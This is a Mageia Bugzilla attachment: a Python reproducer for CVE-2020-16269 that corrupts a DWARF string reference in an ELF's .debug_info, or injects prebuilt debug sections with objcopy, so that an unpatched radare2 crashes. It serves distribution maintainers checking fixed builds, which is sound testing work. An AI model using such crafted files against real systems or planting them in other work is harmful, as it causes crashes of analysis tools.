Mageia Bugzilla – Attachment 12537 Details for
Bug 28476
radare2 new security issues CVE-2020-16269 and CVE-2020-17487
Test file for CVE-2020-16269
test_crash (text/x-python3), 2.69 KB, created by
Len Lawrence
on 2021-03-28 15:42:30 CEST
Description:
Test file for CVE-2020-16269
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2021-03-28 15:42:30 CEST
Size:
2.69 KB
patch
obsolete
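#!/usr/bin/python3
"""Reproducer for CVE-2020-16269 (radare2 DWARF parsing crash).

Produces an ELF whose ``.debug_info`` carries a corrupted ``DW_FORM_strp``
(a reference into the DWARF string table) so that an unpatched radare2
segfaults while parsing it.  Distribution maintainers use it to confirm a
fixed build no longer crashes.

Usage: ``./unRadare2.py -f file_to_patch``

Two cases, as in the original attachment:

* the input already has a ``.debug_info`` section: one byte of that section
  is overwritten and the result is written next to the input as
  ``<file>_PoC``;
* it has none: a small pre-built ``.debug_info`` / ``.debug_abbrev`` pair is
  added to the input *in place* with ``objcopy`` (which must be on PATH).

Bug found by S01den and Architect (with custom fuzzing).
"""
import argparse
import base64
import os
import struct  # unused; kept from the original attachment
import subprocess
import sys
import tempfile

from elftools.elf.elffile import ELFFile
from elftools.elf.enums import ENUM_E_MACHINE  # unused; kept from the original attachment

# Byte offset into .debug_info that is overwritten when the section exists.
# The original author's comment says this is the "shift" of a DW_AT_name
# encoded as DW_FORM_strp; that placement is taken from the attachment and
# was not re-derived here.
PATCH_OFFSET = 0x31
PATCH_VALUE = 0xFF

# Pre-built .debug_abbrev / .debug_info blobs from the original attachment,
# reproduced verbatim, used when the input has no .debug_info of its own.
ABBREV_B64 = "AREBJQ4TCwMOGw4RARIHEBcAAAIWAAMOOgs7C0kTAAADJAALCz4LAw4AAAQkAAsLPgsDCAAABQ8ACwsAAAYPAA=="
INFO_B64 = "OAAAAAQAAAAAAAgBowAAAATXDQAAhxcAAM0OQAAAAAAAYCAAAAAAAAAAAAAAAjAAAAAD1DgAAAADCAcyFQAAAwEI"

# Banner printed on start-up.  Raw strings: the art is full of "\_" and "\/"
# which are invalid escapes (kept literally, but a SyntaxWarning on 3.12+).
# Spacing is as rendered in the attachment view.
BANNER = (
    r"__________ _____ ________ _____ _________ .__ ",
    r"\______ \_______ ____ _____/ ____\ \_____ \_/ ____\ \_ ___ \____________ _____| |__ ",
    r"| ___/\_ __ \/ _ \ / _ \ __\ / | \ __\ / \ \/\_ __ \__ \ / ___/ | \ ",
    r"| | | | \( <_> | <_> ) | / | \ | \ \____| | \// __ \_\___ \| Y \ ",
    r"|____| |__| \____/ \____/|__| \_______ /__| \______ /|__| (____ /____ >___| / ",
    r" \/ \/ \/ \/ \/ ",
)


def build_parser():
    """Return the command-line parser: ``-f/--file`` (default ``main``)."""
    parser = argparse.ArgumentParser(description="Trigger a segfault in radare2 by modifing a DW_FORM_strp in .debug_info")
    parser.add_argument("-f", "--file",
                        type=str, default="main",
                        help="select the file to patch")

    return parser


def _find_debug_info_offset(elffile):
    """Return the file offset of the ``.debug_info`` section, or None.

    Must be called while the stream backing *elffile* is still open, since
    pyelftools reads section headers lazily.
    """
    for section in elffile.iter_sections():
        if section.name == ".debug_info":
            return section['sh_offset']
    return None


def _patch_existing(binary, offset_dbg, filename):
    """Overwrite one byte of the existing ``.debug_info`` and write ``<filename>_PoC``.

    Raises SystemExit with a message if the section is too short for the
    fixed offset (the original would have died with an IndexError).
    """
    target = offset_dbg + PATCH_OFFSET
    if target >= len(binary):
        raise SystemExit("[!] .debug_info is too small to patch at offset %s" % hex(PATCH_OFFSET))
    binary[target] = PATCH_VALUE

    new_filename = filename + "_PoC"
    with open(new_filename, "wb") as new_file:
        new_file.write(binary)

    print("[*] ELF patched ! ----> " + new_filename)


def _add_debug_sections(filename):
    """Add the pre-built ``.debug_info`` and ``.debug_abbrev`` to *filename* in place.

    The blobs are written to a private temporary directory (instead of
    ``tmp_info`` / ``tmp_abbrev`` in the working directory, which could
    clobber unrelated files) and handed to ``objcopy`` as an argument list,
    so a path containing shell metacharacters is passed literally rather than
    interpreted by a shell.  A missing ``objcopy`` or a non-zero exit status
    is reported instead of silently ignored.
    """
    bin_abbrev = base64.b64decode(ABBREV_B64)
    bin_info = base64.b64decode(INFO_B64)

    with tempfile.TemporaryDirectory() as tmpdir:
        info_path = os.path.join(tmpdir, "tmp_info")
        abbrev_path = os.path.join(tmpdir, "tmp_abbrev")
        with open(info_path, "wb") as fh:
            fh.write(bin_info)
        with open(abbrev_path, "wb") as fh:
            fh.write(bin_abbrev)

        for section_name, blob_path in ((".debug_info", info_path),
                                        (".debug_abbrev", abbrev_path)):
            cmd = ["objcopy", "--add-section", section_name + "=" + blob_path, filename]
            try:
                result = subprocess.run(cmd, check=False)
            except FileNotFoundError:
                raise SystemExit("[!] objcopy not found on PATH; cannot add " + section_name)
            if result.returncode != 0:
                # Keep going like the original did, but say so.
                print("[!] objcopy exited with status %d while adding %s" % (result.returncode, section_name))

    print("[*] ELF patched ! ----> " + filename)


def main(argv=None):
    """Entry point.

    Args:
        argv: command-line arguments without the program name; defaults to
            ``sys.argv[1:]``.
    """
    for line in BANNER:
        print(line)

    cli_args = sys.argv[1:] if argv is None else list(argv)
    args = build_parser().parse_args(cli_args)

    # Same behaviour as the original: no arguments at all prints the usage
    # hint and exits 0 rather than patching the default "main".
    if not cli_args:
        print("Command: ./unRadare2.py -f file_to_patch")
        sys.exit()

    filename = args.file

    try:
        with open(filename, "rb") as fh:
            binary = bytearray(fh.read())
            # The section lookup needs the open stream; the offset is all we
            # keep once the file is closed.
            offset_dbg = _find_debug_info_offset(ELFFile(fh))
    except FileNotFoundError:
        raise SystemExit("[!] cannot open " + filename)

    if offset_dbg is not None:
        print("[*] .debug_info section f0und at %s!" % hex(offset_dbg))
        _patch_existing(binary, offset_dbg, filename)
    else:
        print("[!] No .debug_info section f0und :(")
        print("[*] So let's add it !")
        _add_debug_sections(filename)


if __name__ == "__main__":
    main()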